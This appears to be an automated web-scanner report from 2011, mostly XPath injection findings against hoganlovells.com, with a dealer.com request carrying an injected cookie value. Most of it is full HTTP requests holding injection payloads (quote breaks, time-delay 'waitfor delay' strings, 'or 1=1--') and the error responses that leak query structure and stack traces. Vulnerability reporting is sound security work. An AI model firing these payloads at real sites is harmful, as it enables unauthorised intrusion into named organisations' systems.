   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-a
...[SNIP]...

Request 2

GET /solutions/oem/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/oem/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./media/uploads/page/loading.gif=1; com.silverpop.iMA.page_visit./company/contact/=1; com.silverpop.iMA.page_visit./products/=405dbe54cabfaef5)!(sn=*; com.silverpop.iMA.page_visit./products/websites/controlcenter/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=dcaa895e-120d-7361-a2bd-0de29bd4dc3b; exp_last_activity=1303003121; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsolutions%2Foem%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fsolutions%2Fagencies%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts%2Fwebsites%2Fcontrolcenter%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fproducts%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.56.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19998
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Whether you are 1000 miles away or whether you&#8217;re 100 miles away, you really feel that you&#8217;re part of this Dealer.com family.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From an Enterprise Level, Dealer.com's products have saved me hours a month in gathering my reporting and understanding what our site is doing for us. </p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile
...[SNIP]...

2. XPath injection  previous  next
There are 32 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.



2.1. http://www.hoganlovells.com/AboutUs/Online_Client [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs')waitfor%20delay'0%3a0%3a20'--/Online_Client HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:22:19 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6683
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus')waitfor%20delay'0:0:20'--/online_client']' has an invalid token.</title>
<style>
body {font-fa
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus')waitfor%20delay'0:0:20'--/online_client']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus')waitfor%20delay'0:0:20'--/online_client']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.2. http://www.hoganlovells.com/AboutUs/Online_Client [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs/Online_Client' HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:22:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.3. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs'/Online_Client_Service/Overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:40 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8252
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.4. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs/Online_Client_Service'/Overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:41 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.5. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /AboutUs/Online_Client_Service/Overview'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:46 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6763
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus/online_client_service/overview'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>

...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/online_client_service/overview'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/online_client_service/overview'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.6. http://www.hoganlovells.com/aboutus/history/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus'/history/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.7. http://www.hoganlovells.com/aboutus/history/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus/history')waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:22 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6653
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus/history')waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/history')waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/history')waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.8. http://www.hoganlovells.com/aboutus/overview/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus'/overview/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:21:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.9. http://www.hoganlovells.com/aboutus/overview/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /aboutus/overview'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:22:02 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6653
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='aboutus/overview'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/overview'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='aboutus/overview'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.10. http://www.hoganlovells.com/newsmedia/awardsrankings [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia')waitfor%20delay'0%3a0%3a20'--/awardsrankings HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6698
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia')waitfor%20delay'0:0:20'--/awardsrankings']' has an invalid token.</title>
<style>
body {font
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia')waitfor%20delay'0:0:20'--/awardsrankings']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia')waitfor%20delay'0:0:20'--/awardsrankings']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...

2.11. http://www.hoganlovells.com/newsmedia/awardsrankings [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/awardsrankings' HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:11 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

2.12. http://www.hoganlovells.com/newsmedia/awardsrankings/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 92224765'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia92224765'%20or%201%3d1--%20/awardsrankings/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8180
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='newsmedia92224765'%20or%201=1--%20/awardsrankings']' has an invalid token.</title>
<style>
body {font-f
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia92224765'%20or%201=1--%20/awardsrankings']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='newsmedia92224765'%20or%201=1--%20/awardsrankings']' has an invalid token.]
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5070035
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput) +19
MS.Inter
...[SNIP]...

2.13. http://www.hoganlovells.com/newsmedia/awardsrankings/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /newsmedia/awardsrankings'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 17:05:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
